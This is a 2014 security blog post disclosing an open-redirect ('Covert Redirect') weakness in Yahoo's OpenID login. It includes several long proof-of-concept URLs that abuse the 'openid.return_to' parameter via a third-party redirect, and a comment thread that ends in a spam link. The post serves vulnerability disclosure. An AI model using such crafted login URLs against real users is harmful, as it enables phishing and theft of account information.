Saturday, 3 May 2014

Yahoo Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)


















Yahoo Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)



(1) Domain:
yahoo.com


"Yahoo Inc. (styled as Yahoo!) is an American multinational technology company headquartered in Sunnyvale, California. It is globally known for its Web portal, search engine Yahoo Search, and related services, including Yahoo Directory, Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Groups, Yahoo Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo websites every month. Yahoo itself claims it attracts "more than half a billion consumers every month in more than 30 languages." 
Yahoo was founded by Jerry Yang and David Filo in January 1994 and was incorporated on March 1, 1995. Marissa Mayer, a former Google executive, serves as CEO and President of the company." (Wikipedia)







(2) Vulnerability Description:

Yahoo web application has a computer security problem. Hacker can exploit it by Covert Redirect cyber attacks. 


The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. 










(2.1) Vulnerability Detail:

Yahoo's OpenID system is susceptible to Attacks. More specifically, the authentication of parameter "&openid.return_to" in OpenID system is insufficient. It can be misused to design Open Redirect Attacks to Yahoo.



It increases the likelihood of successful Open Redirect Attacks to third-party websites, too.




The vulnerability was reported to Yahoo. Yahoo do not reply the report for months.




The vulnerabilities occurs at page "/openid/op/auth?" with parameter "&openid.return_to", e.g.
https://open.login.yahooapis.com/openid/op/auth?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Ftree.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=J3IvS0xNnpIPn34CEn0hiEWBXYqhaV941hmD.Yx2_vv8JZk2gWSEWoOjpjKYvkNSvP3mUGcz1J1UoIIvaNWTjwMhrKyizwARZNZwooVUVGEvA9sau2DcXoMbLRuhkJ_HOS.O_w--&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry [1]





Before acceptance of third-party application:
When a logged-in Yahoo user clicks the URL ([1]) above, he/she will be asked for consent as in whether to allow a third-party website to receive his/her information. If the user clicks OK, he/she will be then redirected to the URL assigned to the parameter "&openid.return_to".



If a user has not logged onto Yahoo and clicks the URL ([1]) above, the same situation will happen upon login.





After acceptance of third-party application:
A logged-in Yahoo user would no longer be asked for consent and could be redirected to a webpage controlled by the attacker when he/she clicks the URL ([1]).


For a user who has not logged in, the attack could still be completed after a pop-up page that prompts him/her to log in.







(2.1.1) Yahoo would normally allow all the URLs that belong to the domain of an authorized third-party website. However, these URLs could be prone to manipulation. For example, the "&openid.return_to" parameter in the URLs is supposed to be set by the third-party websites, but an attacker could change its value to make Attacks.


Hence, a user could be redirected from Yahoo to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site unwillingly. This is as if the user is redirected from Yahoo directly. The number of Yahoo's OpenID client websites is so huge that such Attacks could be commonplace.


Before acceptance of the third-party application, Yahoo's OpenID system makes the redirects appear more trustworthy and could potentially increase the likelihood of successful Open Redirect Attacks of third-party website.


Once the user accepts the application, the attackers could completely bypass Yahoo's authentication system and attack more easily.


It might be of Yahoo's interest to patch up against such attacks.






(2.2) Used one of webpages for the following tests. The webpage is "http://qianqiuxue.tumblr.com/". Can suppose it is malicious.




Below is an example of a vulnerable third-party domain:
rhogroupee.com




Vulnerable URL in this domain:
http://www.rhogroupee.com/join/context/GENERAL/redirect/http%3A%2F%2Fwww.tetraph.com%2Fessayjeans%2Fpoems%2Ftree.html




Vulnerable URL from Yahoo that is related to rhogroupee.com:
https://open.login.yahooapis.com/openid/op/auth?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fuser-social-network-login%252FauthProvider%252F11%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.rhogroupee.com&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=J3IvS0xNnpIPn34CEn0hiEWBXYqhaV941hmD.Yx2_vv8JZk2gWSEWoOjpjKYvkNSvP3mUGcz1J1UoIIvaNWTjwMhrKyizwARZNZwooVUVGEvA9sau2DcXoMbLRuhkJ_HOS.O_w--&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry




POC:
https://open.login.yahooapis.com/openid/op/auth?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Ftree.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=J3IvS0xNnpIPn34CEn0hiEWBXYqhaV941hmD.Yx2_vv8JZk2gWSEWoOjpjKYvkNSvP3mUGcz1J1UoIIvaNWTjwMhrKyizwARZNZwooVUVGEvA9sau2DcXoMbLRuhkJ_HOS.O_w--&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry








(2.3) The following URLs have the same vulnerabilities.
https://open.login.yahooapis.jp/openid/op/auth?openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.aOpenIDc_handle=NzyCQVND6Ye3gpqIwY2OfibN1TEgEdBdWuFF5f7u0i7vypb6Wc24wHAU9yq38HAVL0ZLMpiYwFsXLRYkDwkrXarvXvAdUgQJG.spVXE0E3pKSlcC.fGzVxuv4Rlz97CrHA--&openid.ui.lang=&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ui.mode=popup&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.realm=http%3A%2F%2Fblogos.com%2F&openid.return_to=http%3A%2F%2Fblogos.com%2Fauth%2Fopenid%2Fyahoo_jp%2Fauthorized%2F



https://login.yahoo.com/config/login?.intl=us&.src=openid&.partner=&.pd=c%3DmZmAFpe.2e7WuWzcHD2ZPYQ-%26ockey%3Dwww.rhogroupee.com%2Fsite%26op%3D1&occrumb=whzgUu25n/7&.done=https%3A%2F%2Fopen.login.yahoo.com%2Fopenid%2Fop%2Fstart%3Fz%3DxInDXI3UxbcCGVeYz0i4ughRSKZSWISpvv91_Uz_XJAiweKdA17AACUzm8IeiLbOCmUn1FcbHfhAcL5Kt66Aa9WnFGbYStqsZkoniGY5xN_EblGXfoCIwAqNMnw1ee_ycMa0xhBAHzQ22FwkhSFPRWP34tKQ_2aagPZ7pgHQyBrNb0xg8pyYTJMtsab5RY1dGP.u4EV7Ayq6Sno.XKNpJaFNyIgttiRS0rdNS7pE1U5kCxFUAPuSjC8QLmP1lTJy5Tsjk2tLkQCKftBzt7G7n0bJaLjDcOv4uEe1X1vkcOgp4lxufA0Qvt9aJnGDhcDj4MEVIfuPeuN.fhfeBgsktxsuof64h0.xrmz1Aw8qTQ57gJibGRJ291Vv_2RF79uaWXDay.DN.5A8Q9_agN6iWDRIKjb8sLKYYR42N2Fk1Nq8hbrP92rsEM0mYHlKIsDXdNlrrK8tM_Jy1E64PDIz8rllNXqlCQ.idF4p4Yi3TzIeeTdYm7gbBleqIsbcEuigfg6n_i6iGmpY%26.scrumb%3D0








POC Video:
https://www.youtube.com/watch?v=1FZ6yfsp09U


Blog Detail:
http://tetraph.blogspot.com/2014/05/yahoos-openid-covert-redirect.html







(3) What is Covert Redirect? 

Covert Redirect is a class of security bugs disclosed in May 2014. It is an application that takes a parameter and redirects a user to the parameter value without sufficient validation. This often makes use of Open Redirect and XSS (Cross-site Scripting) vulnerabilities in third-party applications.


Covert Redirect is also related to single sign-on. It is known by its influence on OAuth and OpenID. Hacker may use it to steal users' sensitive information. Almost all OAuth 2.0 and OpenID providers worldwide are affected. Covert Redirect can work together with CSRF (Cross-site Request Forgery) as well. After Covert Redirect was published, it is kept in some common databases such as SCIP, OSVDB, Bugtraq, and X-Force. Its scipID is 13185, while OSVDB reference number is 106567. Bugtraq ID: 67196.  X-Force reference number is 93031.






Discover and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)









Related Articles:
http://tetraph.com/security/covert-redirect/yahoos-openid-covert-redirect-vulnerablity/
https://twitter.com/tetraphibious/status/559167044256407555
http://securityrelated.blogspot.com/2014/06/yahoo-website-bug.html
http://tetraph.blog.163.com/blog/static/234603051201444023436/
http://webtech.lofter.com/post/1cd3e0d3_706aef5
http://whitehatview.tumblr.com/post/119490381041/securitypost#notes
https://inzeed.wordpress.com/2014/05/26/yahoo-openid-hack/
http://computerobsess.blogspot.com/2014/06/yahoo-website-bug.html
http://www.inzeed.com/kaleidoscope/covert-redirect/yahoos-openid-covert-redirect-vulnerablity/
https://webtechwire.wordpress.com/2014/05/26/yahoo-openid-hack/






5 comments:

  1. Thank you Wang for the vuln report and hard work. You have done us all a great service but as you say there ay not much that can be done at this time. By the way I have shared this with many of the people who follow my blog:)

    ReplyDelete
    Replies
    1. Hey Bradley,

      Thanks for your interest. I am very glad that you shared it.

      More Detail:
      http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
      http://tetraph.com/covert_redirect/

      Delete
  2. This comment has been removed by the author.

    ReplyDelete
  3. http://news.ccidnet.com/art/1032/20140504/5447527_1.html

    今晨,继OpenSSL漏洞后,开源安全软件再曝安全漏洞。新加坡南洋理工大学研究人员Wang Jing发现,Oauth2.0授权接口的网站存“隐蔽重定向”漏洞,黑客可利用该漏洞给钓鱼网站“变装”,用知名大型网站链接引诱用户登录钓鱼网站,一 旦用户访问钓鱼网站并成功登陆授权,黑客即可读取其在网站上存储的私密信息。据悉,腾讯QQ、新浪微博、Facebook、Google等国内外大量知名 网站受影响,360网络攻防实验室已紧急公布了修复方案,企业和个人用户均可通过360安全卫士防范该漏洞攻击。

    Oauth是一个被广泛应用的开放登陆协议,允许用户让第三方应用访问该用户在某一网站 上存储的私密的信息(如照片,视频,联系人列表),而无需将用户名和密码提供给第三方应用。这次曝出的漏洞,可将Oauth2.0的使用方(第三方网站) 的回跳域名劫持到恶意网站去,黑客利用XSS漏洞攻击就能随意操作被授权的账号,读取用户的隐私信息。像腾讯、新浪微博等社交网站一般对登陆回调地址没有 任何限制,极易遭黑客利用。

    ReplyDelete
  4. Since the Yahoo administration was begun, it has experienced large portions of alterations to propel the value of administration to their clients. At whatever point Yahoo does these strategy updates, they will need to until further notice deny section to their administrations. http://annaduncan.livejournal.com/1079.html

    ReplyDelete